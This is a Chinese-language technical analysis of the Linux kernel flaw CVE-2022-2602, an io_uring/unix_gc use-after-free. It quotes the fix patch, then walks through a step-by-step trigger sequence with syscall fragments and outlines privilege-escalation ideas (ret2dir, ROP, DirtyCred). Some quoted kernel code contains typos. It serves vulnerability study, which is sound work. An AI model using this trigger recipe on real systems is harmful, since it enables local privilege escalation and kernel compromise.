内核漏洞分析- CVE-2022-2602
漏洞简介
最近曝出一个新的Linux 内核漏洞CVE-2022-2602。该漏洞是一个USE-AFTER-FREE问题,涉及IO_URING和UNIX两个模块。
影响了UPSTREAM STABLE 5.4.y, 5.15.y 及更高的版本。
目前在最新的UBUNTU上,该漏洞已经被修复。
PATCH
Instead of putting io_uring’s registered files in unix_gc() we want it to be done by io_uring itself. The trick here is to consider io_uring registered files for cycle detection but not actually putting them down.
Because io_uring can’t register other ring instances, this will remove all refs to the ring file triggering the ->release path and clean up with io_ring_ctx_free().
Cc: stable@vger.kernel.org
Fixes: 6b06314c47e1 (“io_uring: add file set registration”)
Reported-and-tested-by: David Bouman dbouman03@gmail.com
Signed-off-by: Pavel Begunkov asml.silence@gmail.com
Signed-off-by: Thadeu Lima de Souza Cascardo cascardo@canonical.com
[axboe: add kerneldoc comment to skb, fold in skb leak fix]
Signed-off-by: Jens Axboe axboe@kernel.dk
-rw-r–r– | include/linux/skbuff.h | 2 | |
---|---|---|---|
-rw-r–r– | io_uring/rsrc.c | 1 | |
-rw-r–r– | net/unix/garbage.c | 20 |
3 files changed, 23 insertions, 0 deletions
diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
index 9fcf534f2d927..7be5bb4c94b6d 100644
--- a/include/linux/skbuff.h
+++ b/include/linux/skbuff.h
@@ -803,6 +803,7 @@ typedef unsigned char *sk_buff_data_t;
* @csum_level: indicates the number of consecutive checksums found in
* the packet minus one that have been verified as
* CHECKSUM_UNNECESSARY (max 3)
+ * @scm_io_uring: SKB holds io_uring registered files
* @dst_pending_confirm: need to confirm neighbour
* @decrypted: Decrypted SKB
* @slow_gro: state present at GRO time, slower prepare step required
@@ -982,6 +983,7 @@ struct sk_buff {
#endif
__u8 slow_gro:1;
__u8 csum_not_inet:1;
+ __u8 scm_io_uring:1;
#ifdef CONFIG_NET_SCHED
__u16 tc_index; /* traffic control index */
diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
index 6f88ded0e7e56..012fdb04ec238 100644
--- a/io_uring/rsrc.c
+++ b/io_uring/rsrc.c
@@ -855,6 +855,7 @@ int __io_scm_file_account(struct io_ring_ctx *ctx, struct file *file)
UNIXCB(skb).fp = fpl;
skb->sk = sk;
+ skb->scm_io_uring = 1;
skb->destructor = unix_destruct_scm;
refcount_add(skb->truesize, &sk->sk_wmem_alloc);
}
diff --git a/net/unix/garbage.c b/net/unix/garbage.c
index d45d5366115a7..dc27635403932 100644
--- a/net/unix/garbage.c
+++ b/net/unix/garbage.c
@@ -204,6 +204,7 @@ void wait_for_unix_gc(void)
/* The external entry point: unix_gc() */
void unix_gc(void)
{
+ struct sk_buff *next_skb, *skb;
struct unix_sock *u;
struct unix_sock *next;
struct sk_buff_head hitlist;
@@ -297,11 +298,30 @@ void unix_gc(void)
spin_unlock(&unix_gc_lock);
+ /* We need io_uring to clean its registered files, ignore all io_uring
+ * originated skbs. It's fine as io_uring doesn't keep references to
+ * other io_uring instances and so killing all other files in the cycle
+ * will put all io_uring references forcing it to go through normal
+ * release.path eventually putting registered files.
+ */
+ skb_queue_walk_safe(&hitlist, skb, next_skb) {
+ if (skb->scm_io_uring) {
+ __skb_unlink(skb, &hitlist);
+ skb_queue_tail(&skb->sk->sk_receive_queue, skb);
+ }
+ }
+
/* Here we are. Hitlist is filled. Die. */
__skb_queue_purge(&hitlist);
spin_lock(&unix_gc_lock);
+ /* There could be io_uring registered files, just push them back to
+ * the inflight list
+ */
+ list_for_each_entry_safe(u, next, &gc_candidates, link)
+ list_move_tail(&u->link, &gc_inflight_list);
+
/* All candidates should have been detached by now. */
BUG_ON(!list_empty(&gc_candidates));
Patch说明中提到,对IO_URING 注册了的文件的清理工作,需要IO_URING自己来做;但是在Unix GC中忽略了这一特殊情况,通过调用__skb_queue_purge(&hitlist),最终将IO_URING注册的文件通过fput过早的free掉了,从而引发了USE-AFTER-FREE问题。Patch在UNIX GC中增加了对IO_URING注册文件的过滤,并且将skb放回到队列中。
漏洞触发过程分析
上面通过Patch分析了漏洞原因,但是想要触发漏洞,还需要做一些缜密的构造。
接下来分析漏洞触发的过程。通过执行以下操作可以复现漏洞。
1
使用userfaultfd或者fuse文件系统,在用户态创建一块内存bogus。该内存在第一次访问时会触发page fault,并且其处理函数在用户态被设置、执行。
2
socketpair(AF_UNIX, SOCK_DGRAM, 0, s);
通过socketpair创建两个AF_UNIX的socket,在内核中会为每一个socket创建一个struct sock和一个struct file(将两个socket的struct sock简称为socka、sockb,将两个struct file简称为file1、file2),并且通过unix_socketpair函数将两个struct sock的peer设置为对方。
unix_peer(ska) = skb;
unix_peer(skb) = ska;
3
创建io_uring。
param->flags = IORING_SETUP_SQPOLL;
fd = io_uring_setup(32, params);
在内核中,通过调用io_uring_get_file,创建了一个unix socket,并将其赋值给了ctx->ring_sock。创建一个struct file。
static struct file *io_uring_get_file(struct io_ring_ctx *ctx)
{
...
ret = sock_create_kern(&init_net, PF_UNUX, SOCK_RAW, IPPROTO_IP,
&ctx->ring_sock);
...
file = anon_inode_getfile("[io_uring]", &io_uring_fops, ctx,
O_RDRW | O_CLOEXEC);
...
ctx->ring_sock->file = file;
...
return file;
}
4
在当前目录创建名为“null”的文件,在内核中会创建strcut file,暂称为file3。使用io_uring_register对file2和file3进行register操作。
rfd[0] = s[1];
rfd[1] = open(“null”, O_RDWR | O_CREATE | O_TRUNC, 0644);
io_uring_register(fd, IORING_REGISTER_FILES, rfd, 2);
register的时候,在内核中会做以下的事情:
- 将file2和file3的file->f_count加1,此时都变成了2;
- struct unix_sock中有一个inflight的成员变量。sockb是一个unix_sock,register处理file2的时候,调用unix_inflight将sockb->inflight值加1,此时inflight值变成了1;将其加入到gc_inflight_list中;
struct unix_sock {
struct sock sk;
struct unix_address *addr;
struct path path;
struct mutex iolock, bindlock;
struct sock peer;
struct list_head link;
atomic_long_t inflitht;
...
};
void unix_inflight(struct user_struct *user, struct file *fp)
{
struct sock *s = unix_get_socket(fp);
spin_lock(&unix_gc_lock);
if (s) {
struct unix_sock *u = unix_sk(s);
if (atomic_long_inc_return(&u->inflight) == 1) { //u->inflight加1
BUG_ON(!list_empty(&u->link));
list_add_tail(&u->link, &gc_inflight_list); //u加入到gc_inflight_list中
} else {
BUG_ON(list_empty(&u->link));
}
/* Paired with READ_ONCE() in wait_for_unix_gc() */
WRITE_ONCE(unix_tot_inflight, unix_tot_inflight + 1);
}
user->unix_inflight++;
spin_unlock(&unix_gc_lock);
}
- 最后创建一个struct skbuff,通过成员变量fp保存了file2和file3的struct file的指针,并且将这个skbuff放到了io_uring对应sk(ctx->ring_sock->sk)的sk_receive_queue中。
static int __io_sqe_files_scm(struct io_ring_ctx *ctx, int nr, int offset)
{
...
skb = alloc_skb(0, GFP_KERNEL); //创建skb
...
if (nr_files) {
fpl->max = SCM_MAX_FD;
fpl->count = nr_files;
UNICB(skb).fp = fpl;
skb->destructor = unix_destruct_scm;
refcount_add(skb->truesize, &sk->sk_wmem_alloc);
skb_queue_head(&sk->sk_receive_queue, skb); //放skb到sk->sk_receive_queue中。
...
}
return 0;
}
5
close(rfd[1]);
但此时file3的file结构的引用计数为2,在减1之后file->f_count为1,由于引用计数不为0并没有free。
6
sendfd(s[0], fd);
socket ska发送一个msg,msg的data部分记录了步骤3中创建的io_uring的fd。
在内核态会做一些类似io_uring_register那样的操作。
- 把io_uring的file引用计数加1;
int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
{
...
for (i = scm->fp->count - 1; i >= 0; i--)
unix_inflight(scm->fp_user, scm->fp->fp[i]); //
return 0;
}
- io_uring的sock(ctx->ring_sock->sk)也是 一个unix_sock, 调用unix_inflight将ctx->ring_sock->sk的inflight值加1,此时都变成了1;将其加入到gc_inflight_list中;
static int unix_dgram_sendmsg(struct socket *sock, struct msghdr *msg,
size_t len)
{
...
other = unix_peer_get(sk);
...
skb = sock_alloc_send_pskb(sk, len - data_len, data_len,
msg->msg_flags & MSG_DONTWAIT, &err,
PAGE_ALLOC_COSTLY_ORDER);
...
skb_queue_tal(&other->sk_receive_queue, skb); //skb放到sockb的sk_receive_queue队列中。
...
}
- 最后创建一个stuct skbuff,将这个struct skbuff放到了socka->peer(即sockb)的sk_receive_queue。
7
close(s[0]);
close(s[1]);
由于file1的引用计数此时为1,对应的struct file结构被free;
file2的引用计数此时是2,减1以后是1,并不会free 对应的struct file结构。
8
调用io_uring_submit,提交一份请求。在请求中做了如下设置:
sqe->opcode = IORING_OP_WRITEV;
sqe->fd = 1;
sqe->addr = (long)bogus;
sqe->len = 1;
sqe->flags = IOSQE_FIXED_FILE;
在系统调用io_uring_enter中,会唤醒内核线程io_sq_thread来处理请求。
SYSCALL_DEFINE6(io_uring_enter, unsigned int ,fd, u32, to_submit,
u32, min_complete, u32, flags, const void __user *, argp
size_t, argsz)
{
...
if (ctx->flags & IORING_SETUP_SQPOLL) {
io_cqring_overflow_flush(ctx);
if (unlikely(ctx->sq_data->thread == NULL)) {
ret = -EOWNERREAD;
goto out;
}
if (flags & IORING_ENTER_SQ_WAKEUP)
wake_up(&ctx->sq_data->wait); //唤醒内核线程io_sq_thread
...
}
...
}
在请求中用户态地址使用了之前设置好的bogus,当内核访问此地址时会引起page fault, 并将返回到用户态调用设置好的处理程序。而用户态处理程序会停下来,等待free操作完成。
static int io_write(struct io_kiocb *req, unsigned int issue_flags)
{
...
if (rw) {
...
} else {
ret = io_import_iovec(WRITE, req, &iovec, iter, !force_nonblock); //造成page fault,等待。。。
...
}
}
9
io_uring_queue_exit(&ring);
销毁io_uring,由于file的引用计数不为1,不会free。
10
close(socket(AF_UNIX, SOCK_DGRAM, 0));
通过一次AF_UNIX的close操作,内核调用了unix_gc。
static void unix_release_sock(struct sock *sk, int embrion)
{
...
if (unix_tot_inflight)
unix_gc();
}
void unix_gc(void)
{
...
list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
long total_refs;
long inflight_refs;
total_refs = file_count(u->sk_sk_socket->file);
inflight_refs = atomic_long_read(&u->inflight);
BUG_ON(inflight_refs < 1);
BUG_ON(total_regs < inflight_refs);
if (total_refs == inflight_refs) { //如果file引用计数与inflight相等
list_move_tail(&u->link, &gc_candidates); //加入gc_candidates中
__set_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
__set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
}
}
list_for_each_entry(u, &gc_candidates, link)
scan_children(&u->sk, dec_inflight, NULL);
list_add(&cursor, &gc_candidates);
while(cursor.next != &gc_candidates) {
u = list_entry(cursor.next, struct unix_sock, link);
list_move(&cursor, &u->link);
if (atomic_long_read(&u->inflight) > 0) {
list_move_tail(&u->link, ¬_cycle_list); //inflight的值大于1的unix_sock移到not_cycle_list中。
__clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
scan_children(&u->sk, inc_inflight_move_tail, NULL);
}
}
list_del(&cursor);
skb_queue_head_init(&hitlist);
list_for_each_entry(u, &gc_candidates, link)
scan_children(&u->sk, inc_flight, &hitlist); //gc_candidates中的unix_sock的接收队列sk_receive_queue上的skb全部移到hitlist中。
while (!list_empty(¬_cycle_list)) {
u = list_entry(not_cycle_list.next, struct unix_sock, link);
__clear_bit(UNIX_GC_CANDIDATEk, &u->gc_flags);
list_move_tail(&u->link, &gc_inflight_list);
}
spin_unlock(&unix_gc_link);
__skb_queue_purge(&hitlist); //清理hitlist中的skb
...
}
- 在unix_gc中首先在gc_inflight_list中查找其file结构的引用计数和inflight值相等的unix_sock,并把他们都转移到gc_candidates链表中。由于file结构的引用计数和inflight的值都是1,file2符合这样的情况,所以对应的sockb被放到了gc_candidates中来。
- 接下来在gc_candidates中把inflight值大于1的unix_sock都转移到not_cycle_list链表中;
- gc_candidates中的unix_sock的队列sk_receive_queue上的skbuff都转移到链表hitlist中;
- 调用__skb_queue_purge(&hitlist)处理hitlist链表上的skbuff,会将前面步骤4中有关file2和file3的skbuff清理掉。 最终在函数__scm_destroy中调用fput(),free他们的file结构。
void __scm_destroy(struct scm_cookie *sum)
{
struct scm_fp_list *fpl = scm->fp;
int i;
if (fpl) {
scm->fp = NULL;
for (i=fpl->count-1; i>=0; i--)
fput(fpl->fp[i]); //free file
free_uid(fpl->user);
kfree(fpl);
}
}
11
处理bogus的page fault的用户态处理程序恢复执行,返回到内核中继续io_sq_thread中对file3的writev操作,则导致了USE-AFTER-FREE问题。
利用思路
在上下文中,有一些比较好的原语可以使用:
if(req->file->f_op->write_iter)
ret2 = call_write_iter(req->file,kiocb, iter);
else if(req->file->f_op->write)
ret2 = loop_rw_iter(WRITE, req, iter);
static inline ssize_t call_write_iter(struct file *file, struct kiocb *kio, struct iov_iter *iter)
{
return file->f_op->write_iter(kio, iter);
}
static ssize_t loop_rw_iter(int rw, struct io_kiocb *req, struct iov_iter *iter)
{
struct kiocb *kiocb = &req->rw.kiocb;
struct file *file = req->file;
…
if (rw == READ) {
nr = file->f_op->read(file, iovec.iov_base, iovec.iov_len, io_kiocb_ppos(kiocb));
else
nr = file->f_op->write(file, iovec.iov_base, iovec.iov_len, io_kiocb_ppos(kiocb));
…
}
其中有代码执行的原语也有写文件的原语。
- 利用思路1: 使用ret2dir进行堆fengshui,然后利用file->f_op->write的调用原语劫持控制流,并且可控内存file作为参数一,通过rop完成利用。
- 利用思路2: 借鉴Dirtycred的思路,寻找一个合适的高权限可读文件进行覆写,达到提权的目的。但是该文件需要是一个支持IOCB_DIRECT的文件或者非常规文件。
总结
在unix_gc中缺少对针对io_uring产生的skbuff的过滤,误将在io_uring中被register文件的struct file结构 free,最终导致USE-AFTER-FREE问题发生。利用AF_UNIX和IO_URING的socket构造一个cycle的场景,并利用userfaultfd或者fuse造成的时间延迟,可以成功触发漏洞。最后结合代码的上下文,分析了两个可能的利用思路。